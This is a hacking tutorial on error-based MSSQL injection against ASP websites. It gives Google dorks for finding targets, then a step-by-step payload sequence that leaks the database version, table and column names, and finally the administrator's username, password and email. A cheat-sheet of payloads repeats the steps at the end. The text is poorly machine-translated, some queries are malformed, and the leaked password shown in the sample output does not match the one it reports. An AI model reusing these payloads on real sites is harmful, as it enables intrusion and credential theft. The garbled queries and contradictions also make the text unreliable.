MS Sql Injection
MSSQL-injection

MSSQL – injection
###########################

1.1 Introduction
1.2 How to ask Vulnerability page?
1.3 How to prove that the site of weakness?
1.4 How to find version / name of the DB?
1.5 How to discover the names table (table_name)?
1.6 How to discover the names of column (column_name)?
1.7 How to get data from tables that interest us (eg name, pass, email, etc.)?
1.8 Conclusion?

[1.1 Introduction]
############

This lesson will try to explain that you already know the different techniques, MSSQL-injection.
Who will have the opportunity to learn how this method is used as a favorite act to obtain information (name, password and login) or various other information through this technique.
MSSQL-injection, can be used for products that are created by well-known company Microsoft.
This type of injection, then deal with those sites that are coded in ASP / Aspks etc.

There are several types of attacks in this way:

* – Normal MSSQL SQL Injection attacks
* – MSSQL injection in Web services (SOAP injection)
* – Union with MSSQL injection attack
* – ODBC error attack the “Convert”
* – MSSQL Blind SQL Injection attacks, etc. ..

For this will be used for writing this type of attack:
“Attack of the ODBC error message” Convert ”

[1.2 How to ask Vulnerability page? ]
############################

How to ask who Vulnerability page is easy. This can use Google services company giant.

Let’s open: Google

I write, for example: inurl: “Boleyn”. “ID”
inurl: “neus.asp” menu ”
inurl: “content.asp” under ”
inurl: “games.asp” ID ”
ETC ….( I decided some examples, you can now use the logic, for better dorks)

[1.3 How to prove that the site of weakness? ]
##################################

So we can understand very easily by adding the following ID page of high comma (,).
And in case that gives us the answer we found no error page means Vulnerability example:

++++++++++++++++++++++++++++++++++++++
/ Microsoft Access ODBC driver /
++++++++++++++++++++++++++++++++++++++
/ Open quotation /
++++++++++++++++++++++++++++++++++++++
/ Microsoft Amos DB provider for Oracle /
++++++++++++++++++++++++++++++++++++++
/ Division by zero in /
++++++++++++++++++++++++++++++++++++++

These are some of the most common response is shown pages that are weaknesses in the MSSQL – injection.

Should now act as an example here, and where to put high ( ‘).

For example:
————————————–

www.localhost.com/news.asp?id=100′

————————————–

Now we can say that the error is displayed:

++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error ‘80040e14 ‘

Open quotation mark after the character string “) AND (Volgorde> 0) ORDER BY Volgorde ‘.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++

This page has weaknesses!

[1.4 How to find version 2.4 / DB name? ]
############################

Let the example easier to understand:

Version:
————————————————– ——————

www.localhost.com/news.asp?id=100+or+1=convert(int,(@@version))–

————————————————– ——————

And we have presented an example:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error ‘80040e07 ‘

Conversion failed when converting nvarchar value ‘MS SQL Server 2008 (SP1) – 10.0.2531.0 (64) 29. March 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Edition (64-bit), the operating systems Windows NT 6.0 (Build 6002: Service Pack 2) (SM), a data type Int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++

Now go find DB_Name:
————————————————– ——————-

www.localhost.com/news.asp?id=100+or+1=convert(int,(DB_Name ()))–

————————————————– ——————-

eg.
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error ‘80040e07 ‘

Conversion is not EVILZONE_CREW_DB when converting nvarchar value ‘to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++

[1.5 How to discover the names table (table_name)]
######################################

Because it is discovered, or simply to find the side of the table goes through this method.

For example:
————————————————– ————————————————– ————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables)) —

————————————————– ————————————————– ————–
And now there will be a mistake, such as:

++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error ‘80040e07 ‘

Conversion is when converting nvarchar value of users’ data on the type Int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++

That is, in this case the table (table_name) The first is the ‘Users’, now find the following table:

For example:
————————————————– ————————————————– ————————————————

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from table_name where information_schema.tables not ( ‘Users’)))–

————————————————– ————————————————– ————————————————

And now an error message will appear the same and will give another table:

++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error ‘80040e07 ‘

Conversion is not news when converting nvarchar value ‘to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++

Another table in this case is ‘news’

Now to find the table (table_name) third goes like this:

For example:
————————————————– ————————————————– ————————————————– ———

www.localhost.com/news.asp?id=100+or+1 =convert(int,(select top 1 table_name from table_name where information_schema.tables not ( ‘Users’,’ news’)))–

————————————————– ————————————————– ————————————————– ———

I appear to us the third table:

++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error ‘80040e07 ‘

Conversion is when converting nvarchar value categories’ of data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++

Then the third table ‘categories’, and so on until you find all the tables.

For example:
————————————————– ————————————————– ————————————————– ——————

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from table_name where information_schema.tables not ( ‘Users’, ‘news’, ‘Categories’))) —

————————————————– ————————————————– ————————————————– ——————

[1.6 How to discover the names of column (column_name)]
###########################################

-If you want to column_name for users as’ go:

For example:
————————————————– ————————————————– —————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name = ‘users’))–

————————————————– ————————————————– —————————————–
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error ‘80040e07 ‘

Conversion failed when converting nvarchar value ‘Name’ to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++

So colums name for the table (table_name) ‘Users’ the ‘name’

Now find the column (column_name) other at the same table ‘Users’:

For example:
————————————————– ————————————————– ————————————————– ——————

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name = ‘users’ and column_name (‘ name’)))–

————————————————– ————————————————– ————————————————– ————————–
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error ‘80040e07 ‘

Conversion is not a password when converting nvarchar value ‘to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++

Columns name (column_name) the other is ‘password’, now go find a rotating column_name:

For example:
————————————————– ————————————————– ————————————————– ——————

www.localhost.com/news.asp?id=100+or+=convert(int,(select top 1 column_name from information_schema.columns where table_name = ‘users’ and column_name ( ‘name’, ‘password’)))–

————————————————– ————————————————– ————————————————– —————————————
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error ‘80040e07 ‘

Conversion failed when converting nvarchar value ’emailaddress’ to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++

Therefore, the third Colum_name ’emailaddress’ and so on and on until the end, to find all of the columns (column_name)!

[1.7 How to get data that interest you (our user name, pass, email, etc.)]
################################################## ###

To do so you do not have anything to ndyshe we mentioned before.
In this section, all that needs to be done is to table (table_name), and the names of column (column_name) in their earlier results found.

In this section will be used:
Table_name = Users
Column_name = user name, password, emailaddress!

Some have now replaced the example:
————————————————– —————————————–
www.localhost.com/news.asp?id =100+or+1=convert (int,(select top 1 name from Users))–[CODE]
————————————————– —————————————–
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error ‘80040e07 ‘

Conversion is not an administrator when converting nvarchar value ‘to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++

user name: Administrator

Replacing now the first column “Name” in the second column “password”:

For example:
————————————————– —————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top password from the user 1))–

————————————————– —————————————–

++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error ‘80040e07 ‘

Conversion failed when converting nvarchar value ‘123456 ‘to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++

password: administratorpassword123

Now, instead of rotating columns works the same as above:

For example:
————————————————– ———————————————

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 from users emailaddress)) —

————————————————– ———————————————

emailaddress: [email protected]

Here then we have achieved some info on, and the name / pass and emailaddress page.

user name: Administrator
password: administratorpassword123
emailaddress: [email protected]

[ 1.8 Conclusion ]
############

================================================== ===========================

www.localhost.com/news.asp?id=100′

————————————————————————————————————————————————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(@@version))–

————————————————————————————————————————————————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(db_name()))–

————————————————————————————————————————————————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables))–

————————————————————————————————————————————————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in (‘Users’)))–

————————————————————————————————————————————————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in (‘Users’ , ‘members’)))–

————————————————————————————————————————————————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in (‘Users’ , ‘members’ , ‘categories’)))–

————————————————————————————————————————————————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name=’Users’))–

————————————————————————————————————————————————————————–

www.ocalhost.com/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name=’Users’ and column_name not in (‘username’)))–

————————————————————————————————————————————————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name=’Users’ and column_name not in (‘username’ , ‘password’)))–

————————————————————————————————————————————————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 username from Users))–

————————————————————————————————————————————————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 password from Users))–

————————————————————————————————————————————————————————–

www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 emailaddress from Users))–

================================================== ===========================

Explore More

How to “become” a google bot

What you’ll need: Firefox, The Modify Headers extension for firefox. What you can do: Many sites allow google to look into their forums, in order to get more traffic by

SQL Commandos (usefull for injections)

Here is a list of SQL commands and what they do, these would be used in some injection methods and of course legitimate sql functions. On thier own they wont

Nmap 5.50 latest Version out !

“Nmap (“Network Mapper”) is a free and open source utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network